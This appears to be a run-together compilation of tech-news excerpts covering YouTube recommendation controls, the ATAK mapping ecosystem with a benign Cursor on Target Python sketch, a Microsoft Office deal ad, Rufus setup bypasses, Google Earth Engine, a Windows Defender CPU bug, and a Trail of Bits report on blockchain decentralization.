[…]
Even the most effective feedback methods prevent less than half of bad recommendations.
[…]
Our main recommendation is that YouTube should enable people to shape what they see.
YouTube’s user controls should be easy to understand and access. People should be provided with clear information about the steps they can take to influence their recommendations, and should be empowered to use those tools.
YouTube should design its feedback tools in a way that puts people in the driver’s seat. Feedback tools should enable people to proactively shape their experience, with user feedback given more weight in determining what videos are recommended.
YouTube should enhance its data access tools. YouTube should provide researchers with access to better tools that allow them to assess the signals that impact YouTube’s algorithm.
Policymakers should protect public interest researchers. Policymakers should pass and/or clarify laws that provide legal protections for public interest research.
In recent years you’ve probably seen a couple of photos of tablets and smartphones strapped to the armor of soldiers, especially US Special Forces. The primary app loaded on most of those devices is ATAK, or Android Tactical Assault Kit. It allows the soldier to view and share geospatial information, like friendly and enemy positions, danger areas, casualties, etc. As a way of working with geospatial information, its civilian applications became apparent, such as firefighting and law enforcement, so CivTAK/ATAK-Civ was created and open sourced in 2020. Since ATAK-Civ was intended for those not carrying military-issued weapons, the acronym magically became the Android Team Awareness Kit. This caught the attention of the open source community, so today we’ll dive into the growing TAK ecosystem, its quirks, and potential use cases.
Tracking firefighting aircraft in 3D space using ADS-B (Credit: The TAK Syndicate)
The TAK ecosystem includes ATAK for Android, iTAK for iOS, WinTAK for Windows, and a growing number of servers, plugins, and tools to extend functionality. At the heart of TAK lies the Cursor on Target (CoT) protocol, an XML or Protobuf-based message format used to share information between clients and servers. This can include a “target’s” location, area, and route information, sensor data, text messages, or medevac information, to name a few. Clients, like ATAK, can process this information as required, and also generate CoT data to share with other clients. A TAK client can also be a sensor node, or a simple Node-RED flow. This means TAK can be a really powerful tool for monitoring, tracking, or controlling the things around you.
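To make CoT concrete, here is a hedged sketch of a minimal position report built and pushed onto the local network from Python. The element and attribute names follow the public CoT schema as commonly documented, and the multicast address and port are the conventional ATAK defaults, so verify both against your own setup:

```python
import socket
import uuid
from datetime import datetime, timedelta, timezone
from xml.etree import ElementTree as ET

def build_cot(lat, lon, callsign):
    """Build a minimal CoT position event (XML flavour)."""
    def iso(t):
        return t.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
    now = datetime.now(timezone.utc)
    event = ET.Element("event", {
        "version": "2.0",
        "uid": str(uuid.uuid4()),
        "type": "a-f-G-U-C",   # "atom, friendly, ground, unit, combat"
        "how": "m-g",          # machine-generated (e.g. from GPS)
        "time": iso(now),
        "start": iso(now),
        "stale": iso(now + timedelta(minutes=5)),
    })
    ET.SubElement(event, "point", {
        "lat": str(lat), "lon": str(lon),
        "hae": "0.0", "ce": "9999999", "le": "9999999",
    })
    detail = ET.SubElement(event, "detail")
    ET.SubElement(detail, "contact", {"callsign": callsign})
    return ET.tostring(event)

# Send to the conventional ATAK multicast group (assumed default 239.2.3.1:6969).
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.sendto(build_cot(52.09, 5.12, "HACKADAY-1"), ("239.2.3.1", 6969))
```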
Standalone tools: Checking line-of-sight and camera coverage
ATAK is a powerful mapping tool on its own. It can display and plot information on a 3D map, calculate a heading to a target, set up a geofence, and serve as a messaging app between team members. Besides using it for outdoor navigation, I’ve used two other built-in mapping features extensively. Viewshed allows you to plan wireless node locations and check their line-of-sight coverage. The “sensor” (camera) markers are handy for planning coverage of CCTV installations. However, ATAK starts to truly shine when you add plugins to extend features, and link clients in a network to share information.
Networking
To allow networking between clients, you either need to set up a multicast network or a central server that all the clients connect to. A popular option for multicast communication is to set up a free ZeroTier VPN, or any other VPN. For client-server topologies, there are several open source TAK servers available that can be installed on a Raspberry Pi or any other machine, including the official TAK server that was recently open sourced on GitHub. FreeTakServer can be extended with its built-in API and optional Node-RED server, and includes an easy-to-use “zero-touch” installer. Taky is another lightweight Python-based server. All these servers also include data package servers, for distributing larger info packs to clients.
Plugins
If an internet connection is not available where you are going, there are several off-grid networking plugins available. HAMMER acts as an audio modem to send CoTs using cheap Baofeng radios. Atak-forwarder works with LoRa-based Meshtastic radios, or you can use APRS-TAK with ham radios.
Plugins can also pull data from other sources, like ADSB data from an RTL-SDR, or the video feed and location information from a drone. Many of the currently available plugins are not open source and are only available through the TAK.gov website after agreeing to terms and conditions from the US federal government. Fortunately, this means there is a lot of space for open source alternatives to grow.
For further exploration, the team behind the FreeTAK server maintains an extensive list of TAK-related tools, plugins, info sources, and hardware.
Tips to get started
At the time of writing, ATAK is significantly more mature than iTAK and WinTAK, so it’s the best option if you want to start exploring. iTAK is actually a bit easier to start using immediately, but it’s missing a lot of features and can’t load plugins.
Open ATAK on Android for the first time and it will quickly become apparent that it is not exactly intuitive to use. I won’t bore you with a complete tutorial but will share a couple of tips I’ve found helpful. Firstly, RTFM. The usage of many of the features and tools is not self-evident, so the included PDF manual (Settings > Support > ATAK Documents) might come in handy. There is also a long list of settings to customize, which are a lot easier to navigate with the search function in the top bar of the Settings menu.
No maps are included in ATAK by default, so download and import [Joshua Fuller]’s ATAK-Maps package. This gives ATAK an extensive list of map sources to work with, including Google Maps and OpenStreetMaps. ATAK can also cache maps and imagery for offline use. ATAK only has low-resolution elevation data included by default, but you can download and import more detailed elevation data from the USGS website.
grommunio efficiently summarizes all requirements of modern, digital communication and collaboration. This includes the device and operating system independent management of sensitive data such as e-mail, contacts, calendar, chat, video conference, file sharing and much more – in real time.
With open source technology based on Linux, grommunio is scalable and meets the highest security requirements. Thanks to its advanced architecture, grommunio can be integrated into existing systems without great effort.
[…]
As the first open source solution with a fully functional implementation of Outlook Anywhere (RPC-over-HTTP) and MAPI-over-HTTP, grommunio is the alternative to proprietary backends for native interoperability with Microsoft Outlook.
Despite the increasing number of more economical options (read also: free) on the market, many people still prefer Microsoft Office over the alternatives available. With millions of users worldwide, the office suite packs programs with powerful functions that enable students, business owners, and professionals to reach peak productivity. From document formatting to presentation building to number crunching, there’s nearly nothing it can’t do in terms of executing digital tasks.
The only setback? A license can be expensive, especially if you’re the one shouldering the fees instead of your company. If you wish to have access to the suite for personal use, you either have to pay recurring fees for a subscription or cough up hundreds in one go for an annual license. If none of these options appeal to you, maybe this Microsoft Office Home and Business: Lifetime License deal can. For our Deals Day sale, you can grab it on sale for only $39.99 — no coupon needed.
This bundle is designed for families, students, and small businesses who want unlimited access to MS Office apps and email without breaking the bank. The license package includes programs you already likely use on the regular, including Word, Excel, PowerPoint, Outlook, Teams, and OneNote. And with a one-time purchase, you can install it on one Mac computer for lifetime Microsoft Office use at home or work.
Upon purchase, you get access to your software license keys and download links instantly. You also get free updates for life across all programs, along with free customer service that offers the best support in case any of the apps run into trouble. The best part? You only have to pay once and you’re set for life.
The Microsoft Office Home and Business: Lifetime License normally goes for $349, but from today until July 14, you can get it for only $39.99 thanks to the special Deals Day event. Click here for Mac and here for Windows.
[…] The latest beta version of Rufus, which in future will be version 3.19, has some interesting new additions. While it writes your ISO, you can optionally disable some of Windows’ more annoying features.
It has the ability to turn off TPM chip detection and the requirement for Secure Boot, which should enable you to install Windows 11 on older machines if you so wish. It lets you bypass the need for a Microsoft account – although you will need to disconnect the target PC from a network for this to work. It also allows you to automatically respond “no” to all Microsoft’s data-collection questions during setup.
All these sound welcome changes to us. The Microsoft account requirement recently popped up a new irritation on our test install: it automatically keeps the Desktop folder on OneDrive, which we found very annoying when we wanted to briefly keep a large file there.
This means that Rufus rockets up the chart of The Reg FOSS desk’s favorite tools for decluttering Windows, and it might even surpass the very handy Ventoy for USB installs.
Already on the list were two O&O tools: AppBuster and ShutUp10++. AppBuster makes it easy to uninstall most of the Metro/Modern apps that Microsoft in its finite wisdom bundles with Windows.
[…]
If you like things clean and minimal, you might want to disable Windows 11’s “widgets” and “chat” buttons. At least no external tools are needed for that.
For the past decade, researchers in academia and the nonprofit world have had access to increasingly sophisticated information about the Earth’s surface, via the Google Earth Engine. Now, any commercial or government entity will have access to Google Cloud’s new enterprise-grade, commercial version of the computer program.
Google originally launched Earth Engine for scientists and NGOs in 2010. One of the world’s largest publicly available Earth observation catalogs, it combines data from satellites and other sources continuously streaming into Earth Engine. The data is combined with massive geospatial cloud-computing resources, which lets organizations use the raw data for timely, accurate, high-resolution insights about the state of the world. That means they can keep a near-constant eye on the world’s forests, water sources, ecosystems and agriculture — and how they’re all changing.
Google Cloud says it’s commercializing Earth Engine now to cater to business customers that are prioritizing sustainability. Businesses are under pressure — from regulators, investors and customers — to reduce their carbon emissions. So, Google is rolling out new products that promise to help them meet their sustainability goals with more and better data.
[…]
Google says Earth Engine will still be available at no cost for nonprofits, academic research and educational use cases.
FreeYourMusic is a paid app available for Android, iOS, Windows, Mac, and Linux that will transfer your data between Apple Music, Spotify, YouTube Music, Deezer, Pandora, Tidal, Soundcloud, and at least a dozen other streaming apps. It also lets you back up and store some of your data locally on your device.
FreeYourMusic’s backup and transfer tools cost $15, but that’s a one-time purchase that grants you lifetime access on all supported devices and streaming apps.
A bug, discovered by TechPowerUp associate software author Kevin Glynn, causes Windows Defender to “randomly start using all seven hardware performance counters provided by Intel Core processors.” A utility Glynn created that monitors and logs performance counters on Intel Core CPUs since 2008 found that the strange behavior results in significantly reduced performance.
Bogged down by Defender hogging CPU time, a Core i9-10850K running at 5GHz loses 1,000 Cinebench points, which is about a 6% drop from the norm. Owners with Intel Core 8th, 9th, 10th, and 11th Gen processors, on both desktops and laptops, have noted similar performance hits.
[…]
As TechPowerUp notes, the underlying problem is that Windows Defender will randomly start using all seven hardware performance counters, including three fixed-function ones. Each counter can be programmed to a different privilege mode and is shared among multiple programs. For whatever reason, Defender is randomly changing the privilege level of the counters, creating a conflict with the programs trying to use them at a different level. It can happen at boot and sporadically thereafter.
To be clear, this is not an issue with Intel processors, because manually overriding the counters and resetting them returns a system to normal performance. There is no way to prevent Windows Defender from harassing your Intel processor unless you download third-party software.
[…]
Another way of overcoming this bug is by downloading software created by Glynn called Counter Control, which identifies when Defender starts using all seven performance counters and “resets” them to their appropriate state.
A more permanent solution is to download TechPowerUp’s ThrottleStop v9.5 software and enable a feature called “Windows Defender Boost” in “Options.” This setting activates a programmable timer that Defender sees and reacts to by ceasing to use all the counters.
[…]Over the past year, Trail of Bits was engaged by the Defense Advanced Research Projects Agency (DARPA) to examine the fundamental properties of blockchains and the cybersecurity risks associated with them. DARPA wanted to understand those security assumptions and determine to what degree blockchains are actually decentralized.
[…]
The report also contains links to the substantial supporting and analytical materials. Our findings are reproducible, and our research is open-source and freely distributable. So you can dig in for yourself.
Key findings
Blockchain immutability can be broken not by exploiting cryptographic vulnerabilities, but instead by subverting the properties of a blockchain’s implementations, networking, and consensus protocols. We show that a subset of participants can garner undue, centralized control over the entire system:
While the encryption used within cryptocurrencies is for all intents and purposes secure, it does not guarantee security, as touted by proponents.
Bitcoin traffic is unencrypted; any third party on the network route between nodes (e.g., internet service providers, Wi-Fi access point operators, or governments) can observe and choose to drop any messages they wish.
Tor is now the largest network provider in Bitcoin; just about 55% of Bitcoin nodes were addressable only via Tor (as of March 2022). A malicious Tor exit node can modify or drop traffic.
More than one in five Bitcoin nodes are running an old version of the Bitcoin core client that is known to be vulnerable.
The number of entities sufficient to disrupt a blockchain is relatively low: four for Bitcoin, two for Ethereum, and less than a dozen for most proof-of-stake networks.
When nodes have an out-of-date or incorrect view of the network, this lowers the percentage of the hashrate necessary to execute a standard 51% attack. During the first half of 2021, the actual cost of a 51% attack on Bitcoin was closer to 49% of the hashrate—and this can be lowered substantially through network delays.
For a blockchain to be optimally distributed, there must be a so-called Sybil cost. There is currently no known way to implement Sybil costs in a permissionless blockchain like Bitcoin or Ethereum without employing a centralized trusted third party (TTP). Until a mechanism for enforcing Sybil costs without a TTP is discovered, it will be almost impossible for permissionless blockchains to achieve satisfactory decentralization.
Novel research within the report
Analysis of the Bitcoin consensus network and network topology
Updated analysis of the effect of software delays on the hashrate required to exploit blockchains (we did not devise the theory, but we applied it to the latest data)
Calculation of the Nakamoto coefficient for proof-of-stake blockchains (once again, the theory was already known, but we applied it to the latest data)
Analysis of software centrality
Analysis of Ethereum smart contract similarity
Analysis of mining pool protocols, software, and authentication
A survey of sources (both academic and anecdotal) supporting our thesis that there is a lack of decentralization in blockchains
The research to which this blog post refers was conducted by Trail of Bits based upon work supported by DARPA under Contract No. HR001120C0084 (Distribution Statement A, Approved for Public Release: Distribution Unlimited). Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the United States Government or DARPA.